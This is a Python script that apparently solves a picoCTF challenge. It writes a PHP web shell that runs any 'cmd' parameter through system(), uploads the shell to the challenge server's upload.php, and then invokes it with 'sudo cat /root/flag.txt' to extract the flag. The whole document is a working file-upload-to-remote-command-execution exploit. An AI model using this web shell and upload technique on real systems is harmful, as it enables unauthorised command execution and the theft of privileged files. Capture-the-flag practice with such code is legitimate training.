import requests
import re

# File name
filename = "php_reverse_shell.php"
url = "http://standard-pizzas.picoctf.net:52558/"

# PHP reverse_shell file content
php_code = """<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
"""

# Write the file to the current directory
with open(filename, "w") as f:
    f.write(php_code)

print(f"\n[+] File {filename} successfully created.")

# Upload URL

# Perform the upload
with open(filename, "rb") as f:
    files = {"file": (filename, f, "application/x-php")}
    response = requests.post(url + "upload.php", files=files)

if response.status_code == 200:
    print("[+] File uploaded successfully.")
else:
    print("[-] Upload failed.")
    exit()

# Retrieve the flag
flag_match = re.search(r"picoCTF\{.*?\}", requests.get(url + "uploads/php_reverse_shell.php?cmd=sudo+cat+/root/flag.txt").text)

if flag_match:
    print(f"[+] FLAG: {flag_match.group(0)}")
else:
    print("[-] Flag not found.")